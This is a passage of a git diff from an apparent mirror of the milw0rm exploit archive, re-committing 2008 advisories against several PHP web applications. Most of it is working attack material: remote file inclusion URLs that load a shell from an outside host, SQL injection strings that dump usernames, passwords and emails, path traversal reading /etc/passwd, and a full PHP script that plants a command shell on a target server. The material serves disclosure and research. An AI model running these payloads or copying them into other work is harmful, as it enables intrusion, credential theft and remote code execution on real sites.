+$ Version: <= 0.03 +$ File affected: manager/static/view.php +$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745 + + +Found by ka0x +D.O.M Labs - Security Researchers +- www.domlabs.org + + +vuln code: + +------------- + +11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){ +13: return; + + +17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!! + // the var $INC isn't declared + +------------- + + +Proof of Concept: +http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ? + + +__EOF__ + +# milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/6475.txt b/platforms/php/webapps/6475.txt index 0a28201f9..08965854f 100755 --- a/platforms/php/webapps/6475.txt +++ b/platforms/php/webapps/6475.txt 
@@ -1,24 +1,24 @@ -################## Piker ####################################### -# -# -# PHP-Crawler v0.8 Remote File Inclusion Vulnerability -# -# -# Affected software: PHP-Crawler 0.8 -# Vendor: http://sourceforge.net/projects/php-crawler/ -# Risk: Critical -# -################################################################ -# -# http://[target]/[path]/footer.php?footer_file=[SHELL] -# -################################################################ -# -# Found by Piker [piker0x90(at)gmail(dot)com] -# D.O.M Labs - Security Researchers -# www.domlabs.org -# -# -################################################################ - -# milw0rm.com [2008-09-17] +################## Piker ####################################### +# +# +# PHP-Crawler v0.8 Remote File Inclusion Vulnerability +# +# +# Affected software: PHP-Crawler 0.8 +# Vendor: http://sourceforge.net/projects/php-crawler/ +# Risk: Critical +# +################################################################ +# +# http://[target]/[path]/footer.php?footer_file=[SHELL] +# +################################################################ +# +# Found by Piker [piker0x90(at)gmail(dot)com] +# D.O.M Labs - Security Researchers +# www.domlabs.org +# +# +################################################################ + +# milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/6478.txt b/platforms/php/webapps/6478.txt index 1113d375e..c31a99960 100755 --- a/platforms/php/webapps/6478.txt +++ b/platforms/php/webapps/6478.txt 
@@ -1,14 +1,14 @@ -#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# -#-----------Technote 7 Remote File Inclusion------------------------# -# ----------developers site: http://www.technote.co.kr--------------# - -bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php - -...snip... -$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray"; -...snip... -include_once "$TWIN_SET[dir_path]/frame_design.php"; - -http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php? - -# milw0rm.com [2008-09-17] +#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------# +#-----------Technote 7 Remote File Inclusion------------------------# +# ----------developers site: http://www.technote.co.kr--------------# + +bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php + +...snip... +$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray"; +...snip... +include_once "$TWIN_SET[dir_path]/frame_design.php"; + +http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php? + +# milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/6480.txt b/platforms/php/webapps/6480.txt index 7df555cd4..62e5069bf 100755 --- a/platforms/php/webapps/6480.txt +++ b/platforms/php/webapps/6480.txt 
@@ -1,33 +1,33 @@ -################## THUNDER ######################################################### -# -# -# X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability -# -# Founded by : THUNDER -# Dork: "This search engine is in no way intended for illegal downloads." -# -##### Vuln Code: ################################################################### -# -# file : /includes/function_core.php -# -88.- include ($web_root."js/Mp3Player.php"); -# -#----------------------------------------------------------------- -# -# file : /templates/layout_lyrics.php -# .5.- include ($web_root."includes/function_list.php"); -# -###### Exploit ##################################################################### -# -# http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt? -# -# http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt? -# -# -# -###### Greets ####################################################################### -# -# MoRoCcan InjEctor5 Te4m and All Hackers -# -#################################################################################### - -# milw0rm.com [2008-09-17] +################## THUNDER ######################################################### +# +# +# X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability +# +# Founded by : THUNDER +# Dork: "This search engine is in no way intended for illegal downloads." +# +##### Vuln Code: ################################################################### +# +# file : /includes/function_core.php +# -88.- include ($web_root."js/Mp3Player.php"); +# +#----------------------------------------------------------------- +# +# file : /templates/layout_lyrics.php +# .5.- include ($web_root."includes/function_list.php"); +# +###### Exploit ##################################################################### +# +# http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt? 
+# +# http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt? +# +# +# +###### Greets ####################################################################### +# +# MoRoCcan InjEctor5 Te4m and All Hackers +# +#################################################################################### + +# milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/6482.txt b/platforms/php/webapps/6482.txt index e9581892c..3743343f6 100755 --- a/platforms/php/webapps/6482.txt +++ b/platforms/php/webapps/6482.txt 
@@ -1,46 +1,46 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -addalink <= 4 - beta / Write approved links without a previous moderation by the admin --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -$ Program: addalink -$ Version: <= 4 - beta -$ File affected: add_link.php -$ Download: http://sourceforge.net/projects/addalink/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - -Linklist is a miniwebsite that you can use in your webpage. Basically it -manages a database of links using PHP+MySQL. Users can send links (url, -description, etc) by a form and one admin has to approve or delete the -links before the publication in the website. - -One not very important problem is that add_link.php doesn't test the -method used (GET or POST). But the real problem is the method to insert -some values. - -Reading the code you can see the SQL sentence: - -INSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email', - '$counter=0','$description','$ip','$date','$category_id','0')"; - -It asign values to approved and counter directly in the SQL sentence. 
For that, -you can enter links approved without moderation writing this: - -http://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link -&approved=1&email=my@email.com&description=blablablablablablabla&category_id=1 - -Also you can alter the counter of visits if you add &counter=XXXX to the GET - - --= Solution =- - - -$approved = 0; -$counter = 0; - -INSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email', - '$counter','$description','$ip','$date','$category_id','0')"; - -# milw0rm.com [2008-09-17] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +addalink <= 4 - beta / Write approved links without a previous moderation by the admin +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +$ Program: addalink +$ Version: <= 4 - beta +$ File affected: add_link.php +$ Download: http://sourceforge.net/projects/addalink/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + +Linklist is a miniwebsite that you can use in your webpage. Basically it +manages a database of links using PHP+MySQL. Users can send links (url, +description, etc) by a form and one admin has to approve or delete the +links before the publication in the website. + +One not very important problem is that add_link.php doesn't test the +method used (GET or POST). But the real problem is the method to insert +some values. + +Reading the code you can see the SQL sentence: + +INSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email', + '$counter=0','$description','$ip','$date','$category_id','0')"; + +It asign values to approved and counter directly in the SQL sentence. 
For that, +you can enter links approved without moderation writing this: + +http://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link +&approved=1&email=my@email.com&description=blablablablablablabla&category_id=1 + +Also you can alter the counter of visits if you add &counter=XXXX to the GET + + +-= Solution =- + + +$approved = 0; +$counter = 0; + +INSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email', + '$counter','$description','$ip','$date','$category_id','0')"; + +# milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/6483.txt b/platforms/php/webapps/6483.txt index 2a4cad37e..a0ba0b97f 100755 --- a/platforms/php/webapps/6483.txt +++ b/platforms/php/webapps/6483.txt 
@@ -1,25 +1,25 @@ -############################################################ -############# E-Php Content Management System ###################### -## HaCker_Egy ; -## Contact : hacker_egy@hotmail.com -## Home : pal-hacker.com & atsdp.com -=============================================== -# Script : E-Php Content Management System -# Download : http://www.ephpscripts.com -=============================================== -# Exploit : - ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/* - - ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/* - -# live Demo : - - ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/* - -## Note : use your mind to get Full exploit D: - -=============================================================== -## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab -=============================================================== - -# milw0rm.com [2008-09-18] +############################################################ +############# E-Php Content Management System ###################### +## HaCker_Egy ; +## Contact : hacker_egy@hotmail.com +## Home : pal-hacker.com & atsdp.com +=============================================== +# Script : E-Php Content Management System +# Download : http://www.ephpscripts.com +=============================================== +# Exploit : + ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/* + + ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/* + +# live Demo : + + ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/* + +## Note : use your mind to get Full exploit D: + +=============================================================== +## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el 
arab +=============================================================== + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6485.txt b/platforms/php/webapps/6485.txt index 83f548aa0..39f6dea96 100755 --- a/platforms/php/webapps/6485.txt +++ b/platforms/php/webapps/6485.txt 
@@ -1,42 +1,42 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -Add a link <= 4 - beta || Remote SQL Injection Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -/ Script: Add a link -/ Version: <= 4 - beta -/ File affected: user_read_links.php -/ Download: http://sourceforge.net/projects/addalink/ -/ need magic_quotes_gpc = Off - - -Found by ka0x -D.O.M Labs - Security Researchers -- www.domlabs.org - - -Vuln Code: --------------- - -32: $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps"; -33: $read_result=mysql_query($read_out_linktable); - -.... - -87: while($data=mysql_fetch_array($read_result)) -88: { -90: echo ""; -91: } - --------------- - -The var $category_id isn't verified. - - -Proof of Concept: - -http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/* - - -__EOF__ - -# milw0rm.com [2008-09-18] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +Add a link <= 4 - beta || Remote SQL Injection Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +/ Script: Add a link +/ Version: <= 4 - beta +/ File affected: user_read_links.php +/ Download: http://sourceforge.net/projects/addalink/ +/ need magic_quotes_gpc = Off + + +Found by ka0x +D.O.M Labs - Security Researchers +- www.domlabs.org + + +Vuln Code: +-------------- + +32: $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps"; +33: $read_result=mysql_query($read_out_linktable); + +.... + +87: while($data=mysql_fetch_array($read_result)) +88: { +90: echo ""; +91: } + +-------------- + +The var $category_id isn't verified. 
+ + +Proof of Concept: + +http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/* + + +__EOF__ + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6486.txt b/platforms/php/webapps/6486.txt index 4c20c9328..d8745a585 100755 --- a/platforms/php/webapps/6486.txt +++ b/platforms/php/webapps/6486.txt 
@@ -1,35 +1,35 @@ - /************************************************************************/ - /* */ - /* ProArcadeScript v1.3 */ - /* */ - /* Remote SQL Injection Vulnerability */ - /* */ - /* */ - /************************************************************************/ - / / - - - [~]AUTHOR : SuNHouSe2 [ALGERIAN HaCkEr] - - [~]HOME : http://www.snakespc.com - - [~]VERSION : Tested on >>> ProArcadeScript v1.3 - - [~]BUY SCRIPT : http://www.proarcadescript.com >>> Price : 59.01 USD - - [~]EXPLOIT : - - http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users-- - - - - ///////////////////////////////////////////////////////////////////////////////////// - - //////// Special ThanX : His0k4,& ALL Snakespc.com Members //////////// - //////// << GOOD RAMADANE FOR ALL MUSLIMS In THE World >> //////////// - - //////////////////////////////////////////////////////////////////////////////////// - - -=-=-=-= SuNHouSe2@yahoo.com =-=-=- - -# milw0rm.com [2008-09-18] + /************************************************************************/ + /* */ + /* ProArcadeScript v1.3 */ + /* */ + /* Remote SQL Injection Vulnerability */ + /* */ + /* */ + /************************************************************************/ + / / + + + [~]AUTHOR : SuNHouSe2 [ALGERIAN HaCkEr] + + [~]HOME : http://www.snakespc.com + + [~]VERSION : Tested on >>> ProArcadeScript v1.3 + + [~]BUY SCRIPT : http://www.proarcadescript.com >>> Price : 59.01 USD + + [~]EXPLOIT : + + http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users-- + + + + ///////////////////////////////////////////////////////////////////////////////////// + + //////// Special ThanX : His0k4,& ALL Snakespc.com Members //////////// + //////// << GOOD RAMADANE FOR ALL MUSLIMS In THE World >> //////////// + + //////////////////////////////////////////////////////////////////////////////////// + + -=-=-=-= 
SuNHouSe2@yahoo.com =-=-=- + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6487.txt b/platforms/php/webapps/6487.txt index 5b5c786d7..9491a0e8e 100755 --- a/platforms/php/webapps/6487.txt +++ b/platforms/php/webapps/6487.txt @@ -1,31 +1,31 @@ -This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask. - -The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass -the user check and then submit any filename to $neturl so that collect.php can read it. - -The vuln code like this: -$url=get_referer(); - $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']); - - $collect_url=empty($neturl) ? $url : $neturl; - - $contents = ''; - if($fid=@fopen($collect_url,"r")) - { - do - { - $data = fread($fid, 4096); - if (strlen($data) == 0) - { - break; - } - $contents .= $data; - } - while(true); - fclose($fid); - } - -POC: -http://XXX.com/collect.php?neturl=../../../etc/passwd - -# milw0rm.com [2008-09-18] +This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask. + +The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass +the user check and then submit any filename to $neturl so that collect.php can read it. + +The vuln code like this: +$url=get_referer(); + $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']); + + $collect_url=empty($neturl) ? $url : $neturl; + + $contents = ''; + if($fid=@fopen($collect_url,"r")) + { + do + { + $data = fread($fid, 4096); + if (strlen($data) == 0) + { + break; + } + $contents .= $data; + } + while(true); + fclose($fid); + } + +POC: +http://XXX.com/collect.php?neturl=../../../etc/passwd + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6488.txt b/platforms/php/webapps/6488.txt index 274d812f8..03d823f9e 100755 --- a/platforms/php/webapps/6488.txt 
+++ b/platforms/php/webapps/6488.txt @@ -1,22 +1,22 @@ -################## sarbot511 ######################################################### -# -# -# jokes script Remote SQL Injection Exploit -# -# Founded by : sarbot511 -# Dork: "All Rights Reserved. Powered by DieselScripts.com" -# -##### Vuln Code: ################################################################### -# -# -###### Exploit ##################################################################### -# -# http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/* -# -###### Greets ####################################################################### -# -# Dr.LiNuX , ABO3TB , ALM511 ,master , all my frinds -# -#################################################################################### - -# milw0rm.com [2008-09-18] +################## sarbot511 ######################################################### +# +# +# jokes script Remote SQL Injection Exploit +# +# Founded by : sarbot511 +# Dork: "All Rights Reserved. Powered by DieselScripts.com" +# +##### Vuln Code: ################################################################### +# +# +###### Exploit ##################################################################### +# +# http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/* +# +###### Greets ####################################################################### +# +# Dr.LiNuX , ABO3TB , ALM511 ,master , all my frinds +# +#################################################################################### + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6489.txt b/platforms/php/webapps/6489.txt index cbd081c58..302ea53f4 100755 --- a/platforms/php/webapps/6489.txt +++ b/platforms/php/webapps/6489.txt 
@@ -1,57 +1,57 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: ProActive CMS LFI - -# -# Vendor: http://www.proactivecms.com/ - -# -# -########################################################### -# -# d0rk:n/a -# -########################################################### - - POC:- http://www.site.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00 - - - - - Live Demo: - http://www.proactivecms.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00 - - - -########################################################### -# -# Bug discovered : 18 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-18] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ 
___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: ProActive CMS LFI + +# +# Vendor: http://www.proactivecms.com/ + +# +# +########################################################### +# +# d0rk:n/a +# +########################################################### + + POC:- http://www.site.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00 + + + + + Live Demo: + http://www.proactivecms.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00 + + + +########################################################### +# +# Bug discovered : 18 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-18] diff --git a/platforms/php/webapps/6492.php b/platforms/php/webapps/6492.php index eaa87f3db..f14d503f9 100755 --- a/platforms/php/webapps/6492.php +++ b/platforms/php/webapps/6492.php 
@@ -1,182 +1,182 @@ -"; - - copy("data/title.dat", "data/settings/title.dat"); - - unlink("data/settings/install.dat"); - copy("data/install.dat", "data/settings/install.dat"); - - copy("data/options.php", "data/settings/options.php"); - - copy("data/pass.php", "data/settings/pass.php"); - - unlink("data/settings/langpref.php"); - copy("data/inc/lang/langpref.php", "data/settings/langpref.php"); - - unlink("data/settings/themepref.php"); - copy("data/inc/themes/themepref.php", "data/settings/themepref.php"); - ... - - see the unlink() calls... the subsequent copy() has no results if you - don't place the source files there... - - Now look at index.php, lines 21-26: - - ... - //Include security-enhancements - include ("data/inc/security.php"); - //Include Translation data - include ("data/settings/langpref.php"); - include ("data/inc/lang/en.php"); - include ("data/inc/lang/$langpref"); - ... - - The script now fails to include the langpref.php script and "langpref" variable is not initialized then, - ***if register_globals=on*** you can include arbitraty files from local resources. - - This check in security.php doesn't work as expected : - ... - //Register Globals - //If Register Globals are ON, unset injected variables - if(isset($_REQUEST)) { - foreach ($_REQUEST as $key => $value) { - if(isset($GLOBALS[$key])) { - unset($GLOBALS[$key]); - } - } - } - ... - ex: http://host/path/index.php?GLOBALS[langpref]=1 - - It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains - overwritten... - - You can include the /data/inc/page_editmeta.php script which contains a nice php injection: - - ... 
- if(isset($_POST['Submit'])) { - $data = "data/content/$editmeta"; - include("data/inc/page_stripslashes.php"); - $file = fopen($data, "w"); - fputs($file, " $value) { - fputs($file, "\n\$incalbum['$name'] = \"yes\";"); - } } - //Check if we also need to include blogs - if ($incblog) { - foreach ($incblog as $name => $value) { - fputs($file, "\n\$incblog['$name'] = \"yes\";"); - } } - fputs($file, "\n ?>"); - fclose($file); - ... - - also this check in /data/inc/page_editmeta.php is unuseful because - you call it from the main script: - - ... - //Make sure the file isn't accessed directly - if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){ - //Give out an "access denied" error - echo "access denied"; - //Block all other code - exit(); - } - ... - - We choose the /data/count.php to inject a php shell then you can launch commands on the target server. - - - */ - - $cmd = "uname";//change here - - error_reporting(7); - $host=$argv[1]; - $path=$argv[2]; - $argv[3] ? $port = (int) $argv[3] : $port = 80; - $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]"); - - $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; - $win ? 
dl("php_curl.dll") : dl("php_curl.so"); - - $url = "http://$host:$port"; - - function send($url,$header) - { - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL,$url); - curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); - curl_setopt($ch, CURLOPT_TIMEOUT, 0); - curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header); - - $data = curl_exec($ch); if (curl_errno($ch)) { - print curl_error($ch)."\n"; - } else { - curl_close($ch); - } - sleep(1); - return $data."\n"; - - } - - $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"; - - $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n"; - $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n"; - send($url,$header); - - //oh, how evil... tested and working against PHP 5.2.4 - $header ="POST ".$path."index.php HTTP/1.0\r\n"; - $header.="Host: $host\r\nUser-Agent: $agent\r\n"; - $header.="Content-Type: application/x-www-form-urlencoded\r\n"; - $header.="Content-Length: 218\r\n"; - $header.="Connection: Close\r\n\r\n"; - $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}"; - send($url,$header); - - $header ="GET ".$path."data/count.php HTTP/1.0\r\n"; - $header.="Host: $host\r\nUser-Agent: $agent\r\n"; - $header.="CMD: $cmd\r\n"; - $header.="Connection: Close\r\n\r\n"; - $out=send($url,$header); - $out=explode("my_flag",$out); - count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... 
:(\n"); -?> - -# milw0rm.com [2008-09-19] +"; + + copy("data/title.dat", "data/settings/title.dat"); + + unlink("data/settings/install.dat"); + copy("data/install.dat", "data/settings/install.dat"); + + copy("data/options.php", "data/settings/options.php"); + + copy("data/pass.php", "data/settings/pass.php"); + + unlink("data/settings/langpref.php"); + copy("data/inc/lang/langpref.php", "data/settings/langpref.php"); + + unlink("data/settings/themepref.php"); + copy("data/inc/themes/themepref.php", "data/settings/themepref.php"); + ... + + see the unlink() calls... the subsequent copy() has no results if you + don't place the source files there... + + Now look at index.php, lines 21-26: + + ... + //Include security-enhancements + include ("data/inc/security.php"); + //Include Translation data + include ("data/settings/langpref.php"); + include ("data/inc/lang/en.php"); + include ("data/inc/lang/$langpref"); + ... + + The script now fails to include the langpref.php script and "langpref" variable is not initialized then, + ***if register_globals=on*** you can include arbitraty files from local resources. + + This check in security.php doesn't work as expected : + ... + //Register Globals + //If Register Globals are ON, unset injected variables + if(isset($_REQUEST)) { + foreach ($_REQUEST as $key => $value) { + if(isset($GLOBALS[$key])) { + unset($GLOBALS[$key]); + } + } + } + ... + ex: http://host/path/index.php?GLOBALS[langpref]=1 + + It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains + overwritten... + + You can include the /data/inc/page_editmeta.php script which contains a nice php injection: + + ... 
+ if(isset($_POST['Submit'])) { + $data = "data/content/$editmeta"; + include("data/inc/page_stripslashes.php"); + $file = fopen($data, "w"); + fputs($file, " $value) { + fputs($file, "\n\$incalbum['$name'] = \"yes\";"); + } } + //Check if we also need to include blogs + if ($incblog) { + foreach ($incblog as $name => $value) { + fputs($file, "\n\$incblog['$name'] = \"yes\";"); + } } + fputs($file, "\n ?>"); + fclose($file); + ... + + also this check in /data/inc/page_editmeta.php is unuseful because + you call it from the main script: + + ... + //Make sure the file isn't accessed directly + if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){ + //Give out an "access denied" error + echo "access denied"; + //Block all other code + exit(); + } + ... + + We choose the /data/count.php to inject a php shell then you can launch commands on the target server. + + + */ + + $cmd = "uname";//change here + + error_reporting(7); + $host=$argv[1]; + $path=$argv[2]; + $argv[3] ? $port = (int) $argv[3] : $port = 80; + $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]"); + + $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; + $win ? 
dl("php_curl.dll") : dl("php_curl.so"); + + $url = "http://$host:$port"; + + function send($url,$header) + { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL,$url); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_TIMEOUT, 0); + curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header); + + $data = curl_exec($ch); if (curl_errno($ch)) { + print curl_error($ch)."\n"; + } else { + curl_close($ch); + } + sleep(1); + return $data."\n"; + + } + + $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"; + + $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n"; + $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n"; + send($url,$header); + + //oh, how evil... tested and working against PHP 5.2.4 + $header ="POST ".$path."index.php HTTP/1.0\r\n"; + $header.="Host: $host\r\nUser-Agent: $agent\r\n"; + $header.="Content-Type: application/x-www-form-urlencoded\r\n"; + $header.="Content-Length: 218\r\n"; + $header.="Connection: Close\r\n\r\n"; + $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}"; + send($url,$header); + + $header ="GET ".$path."data/count.php HTTP/1.0\r\n"; + $header.="Host: $host\r\nUser-Agent: $agent\r\n"; + $header.="CMD: $cmd\r\n"; + $header.="Connection: Close\r\n\r\n"; + $out=send($url,$header); + $out=explode("my_flag",$out); + count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n"); +?> + +# milw0rm.com [2008-09-19] diff --git a/platforms/php/webapps/6494.txt b/platforms/php/webapps/6494.txt index 375d5f804..79bdc3a49 100755 --- a/platforms/php/webapps/6494.txt +++ b/platforms/php/webapps/6494.txt 
